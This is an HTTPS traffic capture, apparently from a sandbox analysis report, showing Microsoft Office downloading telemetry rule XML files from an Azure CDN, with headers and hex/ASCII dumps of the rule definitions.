                                                                                        2024-11-01 12:46:43 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                        Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                        2024-11-01 12:46:44 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                        Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                        2024-11-01 12:46:44 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                        Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                        2024-11-01 12:46:44 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                        2024-11-01 12:46:44 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                        2024-11-01 12:46:44 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                        Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        35192.168.2.44979413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:45 UTC498INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                        x-ms-request-id: 1b669881-b01e-0097-6d1e-2c4f33000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124645Z-159b85dff8f8zww8hC1DFWd99n00000000ng00000000bm3a
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L2_T2
                                                                                        X-Cache: TCP_REMOTE_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:45 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        36192.168.2.44979613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:45 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2980
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: be87860f-801e-0035-4708-2c752a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124645Z-16dc884887b6mtxqhC1DFW3mk000000000g000000000844u
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:45 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        37192.168.2.44979213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:45 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3788
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                        x-ms-request-id: a28262d6-f01e-0003-5708-2c4453000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124645Z-16ccfc49897w2n6khC1DFW5wd800000000g000000000ayg3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:45 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        38192.168.2.44979513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:45 UTC515INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2160
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                        x-ms-request-id: 07004fc3-001e-0028-6c2f-2cc49f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124645Z-159b85dff8f7x84jhC1DFWaghs00000002x0000000007g38
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:45 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        39192.168.2.44979313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:45 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 450
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                        x-ms-request-id: a3e6b75e-301e-000c-5a08-2c323f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124645Z-16dc884887b5wkkfhC1DFWur1000000000cg000000002kxd
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:45 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        40192.168.2.44979713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                        ETag: "0x8DC582B9964B277"
                                                                                        x-ms-request-id: 6c1a5441-101e-00a2-7008-2c9f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124645Z-16ccfc49897pchpfhC1DFW151000000000g000000000fh9t
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        41192.168.2.44979813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                        x-ms-request-id: 6cefda50-401e-0015-2d81-2a0e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-17c5cb586f659tsm88uwcmn6s400000003ng000000000z45
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        42192.168.2.44979913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                        x-ms-request-id: 6074db47-b01e-0002-3124-2c1b8f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-159b85dff8fwqwmdhC1DFWy0a0000000012g0000000091n4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
